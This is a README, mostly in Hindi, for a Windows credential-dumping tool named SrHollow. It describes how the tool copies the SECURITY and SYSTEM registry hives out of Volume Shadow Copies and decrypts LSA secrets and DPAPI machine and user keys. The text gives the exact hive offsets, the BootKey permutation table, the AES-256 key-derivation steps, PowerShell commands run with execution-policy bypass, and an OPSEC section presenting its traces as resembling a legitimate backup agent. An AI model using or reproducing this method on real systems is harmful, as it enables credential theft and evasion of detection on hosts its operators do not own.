
Windows registry hives से मौजूदा या नव निर्मित VSS shadow copies के माध्यम से LSA secrets और DPAPI keys निकालता है, जिसमें inline regf parser और AES-256 decryption शामिल है।
LSA secrets निष्कर्षण, पहले से मौजूद VSS shadow copy का पुनः उपयोग + inline regf parser + bcrypt.dll के माध्यम से AES-256 LSA डिक्रिप्ट।
\GLOBAL?? की गणना करें NtOpenDirectoryObject + NtQueryDirectoryObject के माध्यम से। सबसे अधिक संख्या वाले HarddiskVolumeShadowCopyN को चुनें।SrClient.dll से SRSetRestorePointW(BEGIN_SYSTEM_CHANGE, DEVICE_DRIVER_INSTALL) पर वापस जाएँ।SeBackupPrivilege सक्षम करें (AdjustTokenPrivileges)।CreateFileW("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\Windows\System32\config\{SECURITY,SYSTEM}", FILE_FLAG_BACKUP_SEMANTICS) और byte[] में पढ़ें।regf walker hive को पार्स करता है: base block, cell प्रकार nk/vk/lf/lh/li/ri/db/sk। KeyNode लेआउट, flags @0x02, subkey list @0x1C, value list @0x28, security key @0x2C, class off @0x30, name len u16 @0x48, class len u16 @0x4A (यह पहले प्रयास में एक बग था — Microsoft के स्वयं के दस्तावेज़ यहाँ अस्पष्ट हैं), name @0x4C।ControlSet00N\Control\Lsa\{JD, Skew1, GBG, Data} के Class UTF-16 hex को संयोजित करें → 16 raw bytes → [8,5,4,2,11,9,13,3,0,6,1,12,14,10,15,7] के साथ permute करें।Policy\PolEKList\(default) (172 bytes) से: salt = bytes[0x1C..0x3C]; tmpKey = SHA-256(BootKey || salt * 1000); pt = AES-256-CBC-decrypt(bytes[0x3C..], tmpKey, IV=0); LSA key = pt[68..100]।Policy\Secrets\<name>\CurrVal\(default) के अंतर्गत: समान लेआउट, BootKey के बजाय LSA key के साथ salt-stretch।DPAPI_SYSTEM body: bytes[4..24] = MachineKey, bytes[24..44] = UserKey। ये होस्ट पर प्रत्येक SYSTEM-scoped DPAPI master key को डिक्रिप्ट करते हैं।SrHollow/
├── README.md <- you are here
├── src/
│ └── SrHollow.cs <- inline regf parser + LSA AES crypto (~350 LOC, single file)
└── stages/
├── Stage1-Recon.ps1 <- read-only shadow enumeration
├── Stage1b-ReadShadowHives.ps1 <- auto-detect / auto-create shadow + slurp hives
├── Stage2-Decrypt.ps1 <- BootKey + LSA key + all secrets
└── Stage3-Report.ps1 <- formatted operator report with OPSEC footprint
src/SrHollow.cs में System.Security.Cryptography (जो स्वयं bcrypt.dll को प्रॉक्सी करता है) के अतिरिक्त शून्य निर्भरताएँ हैं। यह Add-Type या csc.exe के माध्यम से यथावत कंपाइल होता है।
Elevated PowerShell
# 1. Read-only recon, see what shadows already exist
powershell.exe -ep bypass -File .\stages\Stage1-Recon.ps1
# 2. Extract SECURITY + SYSTEM from the newest existing shadow
# (creates one via SRSetRestorePointW if none exist)
powershell.exe -ep bypass -File .\stages\Stage1b-ReadShadowHives.ps1
# 3. Derive BootKey + LSA key + decrypt every secret
powershell.exe -ep bypass -File .\stages\Stage2-Decrypt.ps1
# 4. (Optional) formatted operator report
powershell.exe -ep bypass -File .\stages\Stage3-Report.ps1
आवश्यक: local admin (SeBackupPrivilege के लिए), एक Volume Shadow Copy सेवा जो चल रही हो या शुरू की जा सके (Windows 10/11 पर डिफ़ॉल्ट)।
जब shadow पहले से मौजूद हो तो छोड़े गए attributable संकेत:
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN\... पर एक CreateFileWSeBackupPrivilege सक्षम करने वाला एक AdjustTokenPrivilegesbcrypt.dll के माध्यम से मानक SHA-256 + AES-CBC (userland, unremarkable)यह अधिकांश वैध बैकअप एजेंटों के समान file-open प्रोफ़ाइल है।